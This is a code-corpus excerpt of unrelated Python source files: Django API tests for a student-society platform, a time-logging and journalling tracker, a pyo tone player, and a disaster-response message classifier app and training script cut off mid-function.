def setUp(self):
self.user1 = self.createUser('society1')
self.society = self.createSociety(
user=self.user1,
society_id=101,
members=None,
society_type=SocietyType.HUMANISTIC
)
self.user2 = self.createUser(
username='student'
)
self.student = self.createStudent(
user=self.user2
)
def test_kick_member(self):
url = '/api/society_manage/member/kick/'
data = {
'member_id': self.student.id
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user1)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 400)
self.society.members.add(self.student)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 202)
data = {
'hello': 'ncjnb'
}
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 400)
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 403)
class SocietyManageJoinRequestTests(TestCase):
def setUp(self):
self.student_user1 = self.createUser(
'ncj1'
)
self.student1 = self.createStudent(
user=self.student_user1
)
self.student_user2 = self.createUser(
'ncj2'
)
self.student2 = self.createStudent(
user=self.student_user2
)
self.society_user = self.createUser(
username='101'
)
self.society = self.createSociety(
user=self.society_user,
members=None,
society_id=101,
society_type=SocietyType.HUMANISTIC
)
self.jr1 = JoinSocietyRequest.objects.create(
society=self.society,
member=self.student1,
status=JoinSocietyRequestStatus.ACCEPTED
)
self.jr2 = JoinSocietyRequest.objects.create(
society=self.society,
member=self.student2
)
def test_list_join_requests(self):
url = '/api/society_manage/join_request/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user)
response = client.get(url, decode=True)
self.assertEqual(response.data['results'][0]['member']['name'], self.student1.name)
self.assertEqual(response.data['results'][1]['member']['class_num'], self.student2.class_num)
data = {
'status': JoinSocietyRequestStatus.ACCEPTED
}
response = client.get(url, data=data, decode=True)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['member']['grade'], self.student1.grade)
data = {
'status': JoinSocietyRequestStatus.WAITING
}
response = client.get(url, data=data, decode=True)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['member']['grade'], self.student2.grade)
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
def test_update_join_request(self):
url = '/api/society_manage/join_request/{}/'.format(self.jr1.pk)
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user)
data = {
'status': JoinSocietyRequestStatus.DENIED
}
response = client.put(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.jr1.refresh_from_db()
self.assertEqual(self.jr1.status, JoinSocietyRequestStatus.DENIED)
class SocietyManageActivityTests(TestCase):
def setUp(self):
self.society_user = self.createUser(
username='101'
)
self.society = self.createSociety(
user=self.society_user,
members=None,
society_id=101,
society_type=SocietyType.HUMANISTIC
)
self.ar1 = ActivityRequest.objects.create(
society=self.society,
title='keep calm',
content='pick hanzo or die',
place='5510',
start_time=timezone.now()
)
self.ar2 = ActivityRequest.objects.create(
society=self.society,
title='make epic shit',
place='little forest',
status=ActivityRequestStatus.ACCEPTED,
start_time=timezone.now()
)
def test_retrieve_activity_requests(self):
url = '/api/society_manage/activity/{}/'.format(self.ar1.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['title'], 'keep calm')
self.assertEqual(response.data['content'], 'pick hanzo or die')
self.assertEqual(response.data['place'], '5510')
def test_list_activity_requests(self):
url = '/api/society_manage/activity/'
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['results'][0]['title'], 'make epic shit')
self.assertEqual(response.data['results'][1]['title'], 'keep calm')
self.assertEqual(response.data['results'][0]['status'], ActivityRequestStatus.ACCEPTED)
data = {
'status': ActivityRequestStatus.ACCEPTED
}
response = client.get(url, data=data, decode=True)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['title'], 'make epic shit')
data = {
'status': ActivityRequestStatus.WAITING
}
response = client.get(url, data=data, decode=True)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['title'], 'keep calm')
def test_update_activity_requests(self):
url = '/api/society_manage/activity/{}/'.format(self.ar1.pk)
client = APIClient(enforce_csrf_checks=True)
data = {
'status': ActivityRequestStatus.ACCEPTED,
'title': 'do homework',
'place': 'principal room'
}
response = client.patch(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.patch(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.ar1.refresh_from_db()
self.assertEqual(self.ar1.status, ActivityRequestStatus.WAITING) # test read_only
self.assertEqual(self.ar1.title, 'do homework')
self.assertEqual(self.ar1.place, 'principal room')
url = '/api/society_manage/activity/{}/'.format(self.ar2.pk)
data = {
'title': 'do homework',
'place': 'principal room'
}
response = client.patch(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
def test_create_activity_requests(self):
url = '/api/society_manage/activity/'
data = {
'title': 'fudan lecture',
'society': self.society_user.society.id,
'content': '666',
'place': '5106',
'start_time': timezone.now()
}
client = APIClient(enforce_csrf_checks=True)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 201)
ar3 = ActivityRequest.objects.get(pk=response.data['id'])
self.assertEqual(ar3.status, ActivityRequestStatus.WAITING)
self.assertEqual(ar3.title, 'fudan lecture')
self.assertEqual(ar3.content, '666')
self.assertEqual(ar3.society, self.society)
def test_destroy_activity_requests(self):
url = '/api/society_manage/activity/{}/'.format(self.ar1.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.society_user)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 204)
self.assertIsNone(ActivityRequest.objects.filter(pk=self.ar1.pk).first())
class SocietyManageCreditTests(TestCase):
def setUp(self):
self.society_user1 = self.createUser('su1')
self.society_user2 = self.createUser('su2')
self.society1 = self.createSociety(self.society_user1, members=None)
self.society2 = self.createSociety(self.society_user2, members=None)
self.student_user1 = self.createUser('stu1')
self.student_user2 = self.createUser('stu2')
self.student1 = self.createStudent(self.student_user1)
self.student2 = self.createStudent(self.student_user2)
def test_retrieve(self):
url = '/api/society_manage/credit/'
society1_cd = CreditDistribution.objects.create(
society=self.society1,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
self.society1.members.set([self.student1, self.student2])
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user1)
params = {
'year': SettingsService.get('year'),
'semester': SettingsService.get('semester')
}
res = client.get(url, data=params, encode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['year'], timezone.datetime.now().year)
self.assertEqual(res.data['semester'], 1)
self.assertEqual(len(res.data['available_receivers']), 2)
self.assertEqual(res.data['available_receivers'][0]['name'], self.student1.name)
self.assertEqual(res.data['open'], True)
society1_cd.receivers.add(self.student1)
society1_cd.refresh_from_db()
res = client.get(url, data=params, encode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(len(res.data['available_receivers']), 2)
self.assertEqual(len(res.data['receivers']), 1)
society2_cd = CreditDistribution.objects.create(
society=self.society2,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
self.society2.members.set([self.student1, self.student2])
client.force_authenticate(self.society_user2)
res = client.get(url, data=params, encode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(len(res.data['available_receivers']), 1)
# test 404
params = {
'year': 1111,
'semester': 11
}
res = client.get(url, data=params, encode=True)
self.assertEqual(res.status_code, 404)
def test_update(self):
society1_cd = CreditDistribution.objects.create(
society=self.society1,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
self.society1.members.add(self.student1)
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user1)
url = '/api/society_manage/credit/{}/'.format(society1_cd.id)
data = {
'receivers': [
self.student1.id
]
}
res = client.patch(url, data=data, encode=True)
self.assertEqual(res.status_code, 200)
society1_cd.refresh_from_db()
self.assertEqual(society1_cd.receivers_count, 1)
self.assertEqual(society1_cd.receivers.first(), self.student1)
data = {
'receiver': []
}
res = client.patch(url, data=data, encode=True)
self.assertEqual(res.status_code, 400)
society1_cd.open = False
society1_cd.save()
data = {
'receivers': [
self.student1.id
]
}
res = client.patch(url, data=data, encode=True)
self.assertEqual(res.status_code, 406)
class SocietyProfileTests(TestCase):
def setUp(self):
self.society_user1 = self.createUser(
username='101'
)
self.society_user2 = self.createUser(
username='201'
)
self.society1 = self.createSociety(
user=self.society_user1,
members=None,
society_id=101,
society_type=SocietyType.HUMANISTIC
)
self.society2 = self.createSociety(
user=self.society_user2,
members=None,
society_id=201,
society_type=SocietyType.SELFRELIANCE
)
def test_retrieve_profile(self):
url = '/api/society_manage/profile/'
client = APIClient(enforce_csrf_checks=True)
# without login
res = client.get(url)
self.assertEqual(res.status_code, 403)
# society not active
client.force_authenticate(self.society_user1)
res = client.get(url)
self.assertEqual(res.status_code, 403)
self.society1.status = SocietyStatus.ACTIVE
self.society1.save()
res = client.get(url)
self.assertEqual(res.status_code, 200)
print(res.data['id'], self.society1.pk)
print(res.data['society_id'], self.society1.society_id)
def test_update_profile(self):
url1 = '/api/society_manage/profile/{}/'.format(self.society1.pk)
url2 = '/api/society_manage/profile/{}/'.format(self.society2.pk)
client = APIClient(enforce_csrf_checks=True)
data = {
'name': 'test',
'type': SocietyType.SCIENTIFIC,
'status': SocietyStatus.ARCHIVED
}
# without login
res = client.patch(url1, data=data)
self.assertEqual(res.status_code, 403)
# society not active
client.force_authenticate(self.society_user1)
self.assertEqual(res.status_code, 403)
self.society1.status = SocietyStatus.ACTIVE
self.society1.save()
self.society2.status = SocietyStatus.ACTIVE
self.society2.save()
# modify others' profile
res = client.patch(url2, data=data)
self.society2.refresh_from_db()
self.assertEqual(self.society2.name, 'jeek1')
res = client.patch(url1, data=data)
self.society1.refresh_from_db()
self.assertEqual(res.status_code, 200)
self.assertEqual(self.society1.name, 'test')
self.assertEqual(self.society1.type, SocietyType.HUMANISTIC)
self.assertEqual(self.society1.status, SocietyStatus.ACTIVE)
def test_upload_avatar(self):
url = '/api/society_manage/profile/upload_avatar/'
# use 'rb' to solve encoding issue
original_file = open(os.path.join(TEST_FILE_PATH, 'jeek.jpeg'), 'rb')
cropped_file = open(os.path.join(TEST_FILE_PATH, 'cropped.jpeg'), 'rb')
crop = {
'x': 25,
'y': 25,
'width': 50,
'height': 50
}
data = {
'avatar': original_file,
'crop': json.dumps(crop)
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.society_user1)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 202)
self.society1.refresh_from_db()
cropped_img = Image.open(cropped_file)
server_img = Image.open(self.society1.avatar)
diff = ImageChops.difference(cropped_img, server_img)
self.assertIsNone(diff.getbbox())
original_file.close()
cropped_file.close()
```
#### File: StudentPlatform/testing/client.py
```python
from django.test.client import Client as DjangoClient
import json
class Client(DjangoClient):
    def _do_req(self, url, data, method, *args, **kwargs):
        # Pop 'decode' so it is not forwarded to the underlying Django client
        decode = kwargs.pop('decode', False)
        if method == 'GET':
            response = super(Client, self).get(url, data, *args, **kwargs)
        elif method == 'POST':
            response = super(Client, self).post(url, data, *args, **kwargs)
        else:
            response = super(Client, self).delete(url, data, *args, **kwargs)
        if decode:
            return json.loads(response.content)
        return response
    def get(self, url, data=None, *args, **kwargs):
        # Avoid mutable default arguments; fall back to an empty dict per call
        return self._do_req(url, data if data is not None else {}, 'GET', *args, **kwargs)
    def post(self, url, data=None, *args, **kwargs):
        return self._do_req(url, data if data is not None else {}, 'POST', *args, **kwargs)
```
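A minimal usage sketch for the Client wrapper above (a hypothetical Django test snippet; the '/api/ping/' endpoint is assumed, not part of the project):
```python
from testing.client import Client
client = Client()
raw = client.get('/api/ping/')                  # plain Django HttpResponse
parsed = client.get('/api/ping/', decode=True)  # dict parsed from the JSON body
```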
#### File: StudentPlatform/testing/testcases.py
```python
from django.test import TestCase as DjangoTestCase
from django.contrib.auth.models import User
from society.constants import SocietyType, SocietyStatus
from testing.client import Client
from student.models import Student
from society.models import Society
from society_bureau.models import SocietyBureau
class TestCase(DjangoTestCase):
client_class = Client
def createUser(self, username):
return User.objects.create_user(username=username, password=username + '<PASSWORD>')
def createStudent(
self,
user,
name='ncjjj',
grade=1,
class_num=1,
qq='123'
):
return Student.objects.create(
user=user,
name=name,
grade=grade,
class_num=class_num,
qq=qq
)
def createSociety(
self,
user,
members=None,
society_id=None,
status=SocietyStatus.WAITING,
society_type=SocietyType.HUMANISTIC,
name='jeek1',
president_name='ncj',
president_class=1,
president_grade=1
):
society = Society.objects.create(
user=user,
society_id=society_id,
president_name=president_name,
president_class=president_class,
president_grade=president_grade,
type=society_type,
name=name,
status=status
)
if members is not None:
society.members.set(members)
return society
def createSocietyBureau(
self,
user,
real_name='qsm',
qq='2333',
email='<EMAIL>',
):
society_bureau = SocietyBureau.objects.create(
user=user,
real_name=real_name,
qq=qq,
email=email
)
return society_bureau
```
|
{
"source": "JEElsner/DailyData",
"score": 3
}
|
#### File: DailyData/io/text.py
```python
from datetime import datetime, timedelta
from os import PathLike
from pathlib import Path
from typing import List
from .timelog_io import TimelogIO
import pandas as pd
class TextIO(TimelogIO):
def __init__(self, act_folder: Path):
self.activity_folder = act_folder
self.act_list_path = self.activity_folder.joinpath('list.txt')
def record_time(self, activity: str, user: str, timestamp: datetime, backdated=False):
if not self.activity_folder.exists():
self.activity_folder.mkdir()
if not self.act_list_path.exists():
open(self.act_list_path, mode='w').close()
with open(self.act_list_path, mode='r+') as act_list:
if (activity + '\n') not in act_list:
raise ValueError('Unknown activity {}'.format(activity))
with open(self.activity_folder.joinpath(timestamp.strftime('%Y-%m') + '.csv'), mode='a') as file:
file.write(','.join([activity, str(timestamp), '\n']))
def get_timestamps(self, earliest: datetime, latest: datetime) -> List:
        all_df = pd.DataFrame(columns=['activity', 'time'])
        for csv_path in self.activity_folder.glob('*.csv'):
            file_date = datetime.strptime(csv_path.stem, '%Y-%m')
            if earliest <= file_date < latest:
                with open(csv_path) as file:
                    df = pd.read_csv(
                        file, names=['activity', 'time'], usecols=[0, 1])
                    df['time'] = pd.to_datetime(df['time'])
                    df.drop(df[df['time'] > latest].index, inplace=True)
                    df.drop(df[df['time'] < earliest].index, inplace=True)
                    # DataFrame.append was removed in pandas 2.0; concat instead
                    all_df = pd.concat([all_df, df], ignore_index=True)
        return all_df
def new_activity(self, activity: str, parent: str, is_alias: bool):
raise NotImplementedError()
```
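A small usage sketch for TextIO, assuming the activity 'work' has already been added to list.txt (record_time raises ValueError for unknown activities):
```python
from datetime import datetime
from pathlib import Path
from DailyData.io.text import TextIO
io = TextIO(Path('./data/activities'))
io.record_time('work', user='me', timestamp=datetime.now())
print(io.get_timestamps(datetime(2021, 1, 1), datetime(2022, 1, 1)))
```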
#### File: DailyData/time_management/config.py
```python
from dataclasses import dataclass, field
from pathlib import Path
from datetime import datetime, timedelta
@dataclass
class TimeManagementConfig:
activity_folder: Path = Path('./data/activities')
list_begin_time: datetime = datetime.min
list_duration: timedelta = timedelta(days=36500)
def __post_init__(self):
self.activity_folder = Path(
self.activity_folder)
if isinstance(self.list_begin_time, str):
self.list_begin_time = datetime.fromisoformat(self.list_begin_time)
if isinstance(self.list_duration, float):
self.list_duration = timedelta(seconds=self.list_duration)
```
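A sketch of how __post_init__ coerces the raw values a JSON config would supply; the literal values are illustrative only:
```python
from DailyData.time_management.config import TimeManagementConfig
cfg = TimeManagementConfig(
    activity_folder='./data/activities',    # str is coerced to Path
    list_begin_time='2021-01-01T00:00:00',  # ISO string is coerced to datetime
    list_duration=3600.0,                   # float seconds are coerced to timedelta
)
print(cfg.activity_folder, cfg.list_begin_time, cfg.list_duration)
```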
#### File: DailyData/tracker/journaller.py
```python
import json
import os
import random as rand
from datetime import date, datetime
from os import path, system
from pathlib import Path as PathObject
from sys import argv
import ConsoleQuestionPrompts as questions
from DailyData.analyzer import parse_docx
from .. import tracker
class Journaller:
def __init__(self, tracker_cfg):
self.cfg: tracker.TrackerConfig = tracker_cfg
# Prepend act_ for 'activity' to each activity question header.
# This is done to reduce the possibility of duplicates and make it more
# clear what those columns represent.
self.activity_questions = {'act_{e}'.format(e=k):
'Did you {activity} today?'.format(
activity=v)
for k, v in self.cfg.activity_questions.items()}
# Add all activity and event columns to the master list of columns
self.columns = self.cfg.columns + \
list(self.activity_questions.keys())
# Check for duplicate column names
if len(set(self.columns)) != len(self.columns):
raise ValueError('Duplicate column names')
# Construct the path to the CSV file that will store today's entry
self.data_file = self.cfg.stats_folder.joinpath(
str(date.today().year) + self.cfg.data_suffix)
# Get the timezone for later recording
self.timezone = datetime.now().astimezone().tzinfo
def record_and_write_to_file(self):
"""
Take the user's input for the day's statistics and record them. Open the
journalling program if specified in the configuration file.
"""
# Verify data file exists, and create it if it doesn't
if not path.exists(self.data_file):
# Verify that parent folder of data file exists, or create it
if not path.exists(self.cfg.stats_folder):
os.makedirs(self.cfg.stats_folder)
# Create data file
with open(self.data_file, 'w') as f:
f.write(self.cfg.delimiter.join(
self.columns) + '\n')
with open(self.data_file, mode='r+') as file:
try:
# Read in the headers to verify they match the data about to be
# recorded.
headers = next(file).strip().split(self.cfg.delimiter)
# Make sure the headers match the data recorded
if headers != self.columns:
raise ValueError(
'File columns do not match recording columns:\nFile: {f}\nExpected: {e}'.format(f=headers, e=self.columns))
except StopIteration:
pass
# Get the user's input about their statistics
entry = self.record()
        # Make sure the kind of data received from the user matches what is expected
if list(entry.keys()) != self.columns:
raise ValueError(
'Recorded information does not match expected data columns\nRecorded: {r}\nExpected: {e}'.format(r=entry.keys(), e=self.columns))
# Start the journalling program
if self.cfg.open_journal:
time = self.open_journal(entry['journal_day'])
entry['journal_time'] = time.total_seconds()
# Write today's data to the file
file.write(self.cfg.delimiter.join([str(i)
for i in entry.values()]) + '\n')
def record(self):
"""
Ask questions to the user, returning their responses as a dictionary that
maps a key word for the question to the user's response.
Returns
        dict with string keys for each question and a corresponding response.
"""
# Create the dictionary storing the responses
entry = {c: None for c in self.columns}
# Greet the user
# Kindness counts :)
print(self.cfg.greeting, self.cfg.name + '!')
# Verify the date, and allow the user to change it
# This is useful if the user is journalling after midnight, and wants the
# data to be recorded for the previous day
prompt = 'You are journalling for the date of ' + \
str(date.today()) + ' is that correct? Press enter or type \'yes\' if it' + \
' is, or enter the correct date in the form yyyy-mm-dd.\n> '
# Custom function to parse the user's response to the date question
def parse_date_response(response: str):
# If the date is correct, the user either responds with yes or inputs
# nothing
if len(response) == 0 or response.lower()[0] == 'y':
return date.today() # The current date is good, return it
else:
# If the current date is not the desired date, parse the user's
# input for the correct date
try:
return date.fromisoformat(response)
except:
# If the passed date was bad, return None so the question is
# asked again
return None
# Sanitization function to ensure properly-formed delimited files
def sanitize(s: str) -> str:
return s.replace(self.cfg.delimiter, '')
# Ask the question about the date
entry['journal_day'] = questions.ask_question(prompt, in_bounds=lambda x: x is not None,
cast=parse_date_response)
# Record the actual date and time of recording, even if it differs from the
# nominal journal date
entry['time'] = datetime.now(self.timezone)
# Ask the user how their day was relative to yesterday. Later it is asked
# how their day was on a fixed, absolute scale. I think this question is
# important however, for data redundancy and validity. Also it can be hard
# to quantify how good a day is on an absolute scale, and its nice to have
# something to reference.
prompt = 'Today was _________ yesterday.'
choices = ['much worse than',
'worse than',
'the same as',
'better than',
'much better than'
]
entry['relative_score'] = questions.option_question(
prompt, choices, range(-2, 3))
# All of these are pretty self explanatory
# Ask the user a question, and record their response in the dictionary
entry['prod_work'] = questions.range_question(
prompt='how much school work did you do today?\n> '
)
entry['prod_house'] = questions.range_question(
prompt='how much house work (cooking, cleaning, etc.) did you do today?\n> '
)
entry['prod_self'] = questions.range_question(
prompt='how much time did you take for yourself?\n> '
)
prompt = 'how stressed were you today?\n> '
entry['stress'] = questions.range_question(prompt)
entry['bothers'] = questions.ask_question(
prompt='What bothered you today?\n> ',
cast=sanitize
)
entry['gratefuls'] = questions.ask_question(
prompt='What are you grateful for today?\n> ',
cast=sanitize
)
prompt = 'how good of a day was today?\n> '
entry['score'] = questions.range_question(prompt)
# Ask the user a subset of several questions and record their responses
entry.update(questions.ask_some(self.activity_questions,
self.cfg.activity_questions_count))
# Allow the user a little more freedom in expressing the quality of their day
prompt = 'Input any keywords for today. For example, things that happened today.\n> '
entry['keywords'] = questions.ask_question(prompt, cast=sanitize)
# Return the user's responses
return entry
def open_journal(self, date: date, create_file=parse_docx.new_doc, header_func=parse_docx.add_header):
"""
Open the user's desired journal program
Arguments
date The current date so to open the corresponding journal file for
the month
Returns
a datetime.timedelta instance representing the amount of time the user
used their journalling program
"""
# Construct the path to the journal file
journal_path = self.cfg.journal_folder.joinpath(
date.strftime('%Y-%m') + self.cfg.journal_suffix)
# Create the file if it does not exist
self.cfg.journal_folder.mkdir(
parents=True, exist_ok=True)
if not path.exists(journal_path):
create_file(journal_path)
# Add a new header
header_func(journal_path, date.strftime('%Y-%m-%d'))
# Record when the user started editing their journal entry
start = datetime.now()
# Open the journal file with the associated program in the OS
system('start /WAIT ' + str(journal_path.absolute()))
# Return the duration of time the user spent editing their journal
return datetime.now() - start
```
#### File: DailyData/tests/test_configuration.py
```python
from pathlib import Path
import unittest
import DailyData
class TestConfiguration(unittest.TestCase):
def test_DailyData_configuration(self):
self.assertIsNotNone(DailyData.master_config)
self.assertIsInstance(DailyData.master_config.configured, bool)
self.assertIsInstance(DailyData.master_config.data_folder, Path)
# self.assertIsInstance(DailyData.master_config.analyzer,
# DailyData.analyzer.Configuration)
# self.assertIsInstance(DailyData.master_config.tracker,
# DailyData.tracker.Configuration)
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JEElsner/DataSong",
"score": 3
}
|
#### File: JEElsner/DataSong/audio.py
```python
from pyo import Server, Sine
import time
class AudioManager:
'''
AudioManager class to abstract away interaction with the Python audio
library pyo
'''
def __init__(self):
'''
Start the audio server and a silent tone
'''
self.server = Server(winhost='mme')
self.server.boot().start()
        # Sine(freq=0, phase=0, mul=0.1): zero frequency makes the tone silent, low mul keeps it quiet
self.tone = Sine(0, 0, 0.1)
self.tone.out()
def setFreq(self, freq):
'''
Change the frequency of the tone
'''
self.tone.setFreq(float(freq))
def stop(self):
'''
Stop the audio server
'''
self.server.stop()
def __del__(self):
# Code to make sure the server stops automatically when we stop using
# the audio manager class
self.stop()
def play_freqs(freqs, bpm):
'''
    Plays the iterable of frequencies provided at the
    specified beats per minute.
'''
freqs = freqs.astype(float)
sec_per_beat = 60 / bpm
s = Server(winhost='mme')
s.boot()
s.start()
a = Sine(float(freqs[0]), 0, 0.1)
a.out()
for f in freqs:
a.setFreq(float(f))
# We really don't have to be precise about how long we're sleeping
# right now
time.sleep(sec_per_beat)
s.stop()
```
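A minimal sketch of driving AudioManager, assuming a working pyo installation (the 'mme' host above is Windows-specific):
```python
import time
from audio import AudioManager
mgr = AudioManager()
for freq in (262, 330, 392, 523):  # an ascending C-major arpeggio
    mgr.setFreq(freq)
    time.sleep(0.5)
mgr.stop()
```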
|
{
"source": "jeena72/disaster-response-pipeline",
"score": 3
}
|
#### File: disaster-response-pipeline/app/run.py
```python
import json
import plotly
import pandas as pd
import joblib
import nltk
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.base import BaseEstimator, TransformerMixin
from flask import Flask
from flask import render_template, request, jsonify
from plotly.graph_objs import Bar
from sqlalchemy import create_engine
app = Flask(__name__)
def tokenize(text):
"""
Passed string is normalized, lemmatized, and tokenized
Parameters
-----------
text : str
text to be tokenized
Returns
----------
clean_tokens : list
Contains generated tokens
"""
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
class StartingVerbExtractor(BaseEstimator, TransformerMixin):
"""
This transformer class extract the starting verb of a sentence
"""
def starting_verb(self, text):
sentence_list = nltk.sent_tokenize(text)
for sentence in sentence_list:
            pos_tags = nltk.pos_tag(tokenize(sentence))
            if not pos_tags:  # guard: sent_tokenize can yield token-less sentences
                continue
            first_word, first_tag = pos_tags[0]
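            # e.g. a message like "send help now" gets its first token tagged
            # as a verb ('VB'), so the extractor reports True for that message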
if first_tag in ['VB', 'VBP'] or first_word == 'RT':
return True
return False
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.starting_verb)
return pd.DataFrame(X_tagged)
# load data
engine = create_engine('sqlite:///../data/DisasterResponse.db')
df = pd.read_sql_table('DisasterResponseData', engine)
# load model
model = joblib.load("../models/classifier.pkl")
# index webpage displays cool visuals and receives user input text for model
@app.route('/')
@app.route('/index')
def index():
# extract data needed for visuals
# for plot-1
genre_counts = df.groupby('genre').count()['message'].sort_values(ascending=False)
genre_names = list(genre_counts.index)
# for plot-2
labels_data = df[[col for col in df.columns.tolist() if col not in ["id", "message", "original", "genre"]]]
imbalance_df = pd.concat([pd.Series(labels_data.mean(), name="1"), pd.Series(1 - labels_data.mean(), name="0")], axis=1)
imbalance_df.sort_values(by=["1"], inplace=True)
message_categories_list = imbalance_df.index.tolist()
ones_count_normalized = imbalance_df["1"]
zeros_count_normalized = imbalance_df["0"]
# create visuals
graphs = [
{
'data': [
Bar(
x=genre_names,
y=genre_counts,
width=0.5
)
],
'layout': {
'title': 'Distribution of Message Genres',
'yaxis': {
'title': "Count"
},
'xaxis': {
'title': "Genre"
}
}
},
{
'data': [
Bar(
x=ones_count_normalized,
y=message_categories_list,
name="1 - category present",
orientation="h",
width=0.9
),
Bar(
x=zeros_count_normalized,
y=message_categories_list,
name="0 - category absent",
orientation="h",
width=0.9
)
],
'layout': {
'title': 'Data imbalance distribution, Total messages: {}'.format(labels_data.shape[0]),
'yaxis': {
'title': "Message category"
},
'xaxis': {
'title': "Fraction"
},
'barmode': "stack",
                'automargin': False,
                'height': 650,
                'margin': dict(l=160, r=60, t=60, b=55)
}
}
]
# encode plotly graphs in JSON
ids = ["graph-{}".format(i) for i, _ in enumerate(graphs)]
graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)
# render web page with plotly graphs
return render_template('master.html', ids=ids, graphJSON=graphJSON)
# web page that handles user query and displays model results
@app.route('/go')
def go():
# save user input in query
query = request.args.get('query', '')
# use model to predict classification for query
classification_labels = model.predict([query])[0]
classification_results = sorted(list(zip(df.columns[4:], classification_labels)), key=lambda x: x[1], reverse=True)
# This will render the go.html Please see that file.
return render_template(
'go.html',
query=query,
classification_result=classification_results
)
def main():
app.run(host='127.0.0.1', port=3001, debug=True)
if __name__ == '__main__':
main()
```
#### File: disaster-response-pipeline/models/train_classifier.py
```python
import sys
import pandas as pd
import numpy as np
import nltk
from joblib import dump
from sqlalchemy import create_engine
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import AdaBoostClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.multioutput import MultiOutputClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import classification_report
nltk.download('punkt')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
def load_data(database_filepath):
"""
Load and generate datasets for fitting along with message categories list
Parameters
-----------
database_filepath : str
SQLite database file path
Returns
----------
X : DataFrame
Contains messages for generating features
Y : DataFrame
Contains binary labels for various message categories
category_names : list
List of different message categories
"""
engine = create_engine('sqlite:///' + database_filepath)
df = pd.read_sql_table("DisasterResponseData", con=engine)
X = df["message"]
Y = df[[col for col in df.columns.tolist() if col not in ["id", "message", "original", "genre"]]]
category_names = Y.columns.tolist()
return X, Y, category_names
def tokenize(text):
"""
Passed string is normalized, lemmatized, and tokenized
Parameters
-----------
text : str
text to be tokenized
Returns
----------
clean_tokens : list
Contains generated tokens
"""
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
class StartingVerbExtractor(BaseEstimator, TransformerMixin):
"""
This transformer class extract the starting verb of a sentence
"""
def starting_verb(self, text):
sentence_list = nltk.sent_tokenize(text)
for sentence in sentence_list:
            pos_tags = nltk.pos_tag(tokenize(sentence))
            if not pos_tags:  # guard: skip sentences that produce no tokens
                continue
            first_word, first_tag = pos_tags[0]
if first_tag in ['VB', 'VBP'] or first_word == 'RT':
return True
return False
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.starting_verb)
return pd.DataFrame(X_tagged)
def build_model(useGridSearch=False):
"""
Creates scikit Pipeline object for processing text messages and fitting a classifier.
Parameters
-----------
useGridSearch: bool
If grid search be used for model training
Returns
----------
pipeline : Pipeline
Pipeline object
"""
pipeline = Pipeline([
("features", FeatureUnion([
('text_pipeline', Pipeline([
('count_vectorizer', CountVectorizer(tokenizer=tokenize)),
('scaler', StandardScaler(with_mean=False))
])),
('tfidf_transformer', TfidfVectorizer()),
('starting_verb_extr', StartingVerbExtractor())
])),
("clf", MultiOutputClassifier(AdaBoostClassifier()))
])
if useGridSearch:
parameters = {
'features__text_pipeline__count_vectorizer__max_df': (0.5, 1.0),
'features__tfidf_transformer__use_idf': (True, False),
